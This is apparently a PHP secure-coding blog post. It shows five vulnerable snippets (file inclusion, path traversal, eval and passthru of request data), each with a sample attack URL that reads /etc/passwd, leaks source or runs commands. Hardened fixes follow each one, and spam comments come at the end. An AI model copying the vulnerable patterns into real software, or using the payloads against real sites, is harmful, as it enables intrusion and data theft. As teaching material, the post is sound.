Fatal errors when writing PHP scripts
Posted by newbiekid, Apr 17
======case 1======
[scripts]
// The request parameter is used, unchecked, as the path handed to include().
$page = $_GET['page'];
include($page);
[attack]
http://victim.com/file.php?page=[evil scripts]
Any readable local file is pulled in and executed as PHP (local file inclusion); when allow_url_include is on, [evil scripts] can be a remote URL as well (remote file inclusion).
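The fix for case 1 is not to filter the path but to stop treating the parameter as a path at all. This added example (mine, not from the original post) maps a short token to a file the application owns; the page names and file locations are hypothetical placeholders:

```php
<?php
// Added example, not part of the original post: allowlisted include for case 1.
// The request selects a key; only values from this table are ever included,
// so "../../etc/passwd", "http://evil/x.txt" and "%00" all miss the lookup.

// Hypothetical page map for this example.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Return the file for a requested page token, or null if it is not allowed.
function resolve_page(string $requested): ?string
{
    // Exact-match lookup only; no normalisation, no prefix stripping.
    return PAGES[$requested] ?? null;
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page($page);
if ($file === null) {
    http_response_code(404);
    exit('unknown page');
}
// The included path is built from a constant plus a table value we control.
include __DIR__ . '/' . $file;
```

Do not be tempted by basename() or str_replace('..', '') as a substitute: the first still lets the caller pick any file in the directory, and the second is bypassed by "....//", which collapses to "../" after one pass.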
======case 2======
[scripts]
// The file to serve, its size and the download name all come straight from the request.
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($_GET['file']));
header('Content-Disposition: inline; filename="' . $_GET['file'] . '"');
readfile($_GET['file']);
[attack]
http://victim.com/file.php?file=index.php
The script's own source, including any credentials it holds, is sent back as a download; file=../../../etc/passwd reads the same way. The unescaped value is also written into the Content-Disposition header, so quotes and CR/LF in the parameter reach the response headers.
=======case 3=======
[scripts]
// A fixed prefix and a fixed suffix around an unchecked request value.
$fp = fopen("/path/{$_GET['filename']}.txt", 'r');
[attack]
http://victim.com/file.php?filename=../../../etc/passwd
The "/path/" prefix does nothing against traversal. The appended ".txt" only helps while it cannot be cut off: on PHP releases before 5.3.4 a %00 in the parameter truncated the path at the NUL byte, so filename=../../../etc/passwd%00 opened /etc/passwd; later releases reject paths containing NUL, but the traversal itself is still there.
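Cases 2 and 3 share one root cause, a request value spliced into a filesystem path, and one fix: validate the name, resolve the path with realpath() and refuse anything that ends up outside the directory you meant to serve. This added example (mine, not the post's code) does that once in safe_path() and uses it for both the download handler and the fopen() call; the two directory names are hypothetical:

```php
<?php
// Added example, not part of the original post: path containment for cases 2 and 3.

const DOWNLOAD_DIR = '/var/www/downloads'; // hypothetical location of served files
const NOTES_DIR    = '/var/www/notes';     // hypothetical location of the .txt notes

/**
 * Return the canonical path of $name (plus optional $suffix) inside $base,
 * or null if the name is malformed or the resolved file escapes $base.
 */
function safe_path(string $base, string $name, string $suffix = ''): ?string
{
    // Reject rather than sanitise: no separators, no NUL, no leading dot.
    // "..", "../x", "..\\x", "/etc/passwd" and "x%00" all fail this test.
    // \z (not $) so a trailing newline cannot sneak past the anchor.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]*\z/', $name)) {
        return null;
    }
    $baseReal = realpath($base);
    $real     = realpath($base . '/' . $name . $suffix);
    if ($baseReal === false || $real === false) {
        return null; // base directory missing, or the file does not exist
    }
    // realpath() follows symlinks, so a link inside $base that points at
    // /etc/passwd resolves outside $baseReal and is refused here.
    if (strncmp($real, $baseReal . '/', strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Case 2, hardened: only files directly under DOWNLOAD_DIR can be served.
function send_download(string $name): void
{
    $path = safe_path(DOWNLOAD_DIR, $name);
    if ($path === null) {
        http_response_code(404);
        exit('no such file');
    }
    // The header is built from the validated base name, so no quote or
    // CR/LF from the request can reach the Content-Disposition line.
    $safeName = basename($path);
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($path));
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    readfile($path);
}

// Case 3, hardened: ".txt" is appended after validation and the result is
// still required to sit under NOTES_DIR. Returns a stream resource or null.
function open_note(string $name)
{
    $path = safe_path(NOTES_DIR, $name, '.txt');
    return $path === null ? null : fopen($path, 'r');
}

send_download($_GET['file'] ?? '');
```

Because the regex forbids "/" and "\", traversal is already impossible before realpath() runs; the containment check stays in as defence in depth against symlinks and against someone later loosening the regex to allow subdirectories.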
======case 4======
[scripts]
// The request body is handed to the PHP interpreter as code.
eval($_GET['ev']);
[attack]
http://victim.com/file.php?ev=include($_GET['vegetoo']);&vegetoo=[evil code]
Whatever arrives in ev runs as PHP. Here the evaluated snippet includes a second parameter, so vegetoo names a file or URL holding the attacker's code; something as short as ev=system('id'); works just as well.
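There is no safe way to eval() request data; the replacement is a fixed table in which the request picks an entry and never supplies code. This added example (mine, not from the post) shows that shape; the operation names and their implementations are hypothetical:

```php
<?php
// Added example, not part of the original post: a dispatch table in place of
// eval($_GET['ev']) from case 4. The request chooses a key; the code that runs
// is fixed at development time, so "include($_GET['x']);" or "system('id');"
// is simply an unknown key.

// Hypothetical set of operations this endpoint is meant to offer.
const OPERATIONS = [
    'upper' => 'strtoupper',
    'lower' => 'strtolower',
    'len'   => 'strlen',
];

function run_operation(string $op, string $arg): string
{
    // Look the key up in OUR table. Never use the request value itself as a
    // callable (call_user_func($_GET['f']) is eval() by another name).
    if (!array_key_exists($op, OPERATIONS)) {
        throw new InvalidArgumentException("unknown operation: $op");
    }
    $fn = OPERATIONS[$op];
    return (string) $fn($arg);
}

try {
    $result = run_operation($_GET['op'] ?? '', $_GET['arg'] ?? '');
    echo htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'bad request';
}
```

If the feature genuinely needs user-written expressions (a formula field, say), parse them with a small purpose-built evaluator that only knows numbers and operators; PHP's own parser is far too capable to be pointed at untrusted input.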
==========case 5==========
[scripts]
// The request value is the entire shell command line.
passthru($_GET['cmd']);
[attack]
http://victim.com/file.php?cmd=ls -al
The parameter is the whole command line (the space is sent as %20), so the attacker runs anything the web server user can; cmd=id;cat /etc/passwd chains commands in the same way.
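For case 5 the request must never supply a command, only an argument to a command the code already fixed, and even that argument is validated and then quoted with escapeshellarg(). This added example (mine, not from the post) keeps the "ls -al" behaviour for a directory the user may choose from under one root; the root directory is a hypothetical placeholder:

```php
<?php
// Added example, not part of the original post: case 5 with the command fixed
// in code and only a validated, escaped argument taken from the request.

const LIST_ROOT = '/var/www/shared'; // hypothetical directory users may list

// Return the "ls -al" listing of LIST_ROOT/$sub, or '' if $sub is not acceptable.
function list_directory(string $sub): string
{
    // One path component: letters, digits, dot, dash, underscore; no separators.
    if (!preg_match('/^[A-Za-z0-9._-]+\z/', $sub) || $sub === '.' || $sub === '..') {
        return '';
    }
    $root = realpath(LIST_ROOT);
    $dir  = realpath(LIST_ROOT . '/' . $sub);
    // Defence in depth: even a symlink named "docs" that points elsewhere is refused.
    if ($root === false || $dir === false
        || strncmp($dir, $root . '/', strlen($root) + 1) !== 0) {
        return '';
    }
    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // ones, so ";", "|", "$(...)" and backticks inside $dir are data, not syntax.
    $out = shell_exec('ls -al ' . escapeshellarg($dir));
    return is_string($out) ? $out : '';
}

$listing = list_directory($_GET['dir'] ?? '');
if ($listing === '') {
    http_response_code(404);
    exit('no such directory');
}
echo '<pre>' . htmlspecialchars($listing, ENT_QUOTES, 'UTF-8') . '</pre>';
```

The validation step is doing most of the work here; escapeshellarg() is the backstop for the case where a later change lets a less restricted value through. If the listing is all the feature needs, scandir() removes the shell from the picture entirely.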

9 comments
Comment by German Moreida on February 23, 2011 at 3:48 am
Whoa! What an amazing page! Many thanks. I just saved your website as a favorite; I hope you'll develop extra material in this way.
Comment by Thai Massage on February 23, 2011 at 7:45 am
I'm usually into blogging and I actually recognize your content. The article has really piqued my interest. I'm going to bookmark your website and keep checking for brand spanking new information.
Comment by x pole sport on February 23, 2011 at 8:27 am
Sorry for the huge review, but I’m really loving the new Zune, and hope this, as well as the excellent reviews some other people have written, will help you decide if it’s the right choice for you.
Comment by Darci Sterling on February 24, 2011 at 8:34 pm
It's really a great and useful piece of info. I'm happy that you shared this useful info with us. Please keep us informed like this. Thanks for sharing.
Comment by jeux gratuits on March 4, 2011 at 12:00 am
It's an exceptionally communicative posting; actually I'm new to the speciality problem, so this longhand helps me much enlarge my knowledge.
Comment by free download the lincoln lawyer movie on March 19, 2011 at 4:26 am
Took me time to study all the feedback, but I seriously appreciated the submit. It proved to grow to be fairly useful to me and I'm positive to all the commenters right here. It's often terrific once you can not just be informed, but in addition entertained. I'm positive you had enjoyable writing this submit.
Comment by Free Macbook Pro on April 13, 2011 at 6:41 pm
That is really attention-grabbing. You're an overly skilled blogger. I have joined your feed and look forward to more of your wonderful posts. Also, I have shared your site in my social networks!
Comment by local mobile monopoly review on April 14, 2011 at 8:47 am
Wow! This is one of the most beneficial blogs I have ever come across on this subject. Actually great. I'm also an expert in this topic so I can understand your hard work.
Comment by kursi rotan sintetis on April 14, 2011 at 8:51 am
Wow! It is like you understand my mind! You appear to understand a great deal about this, like you wrote the guide in it or something. I think that you simply could do with some images to drive the content material home a bit, but other than that, this is excellent weblog. An excellent study. I will definitely be again.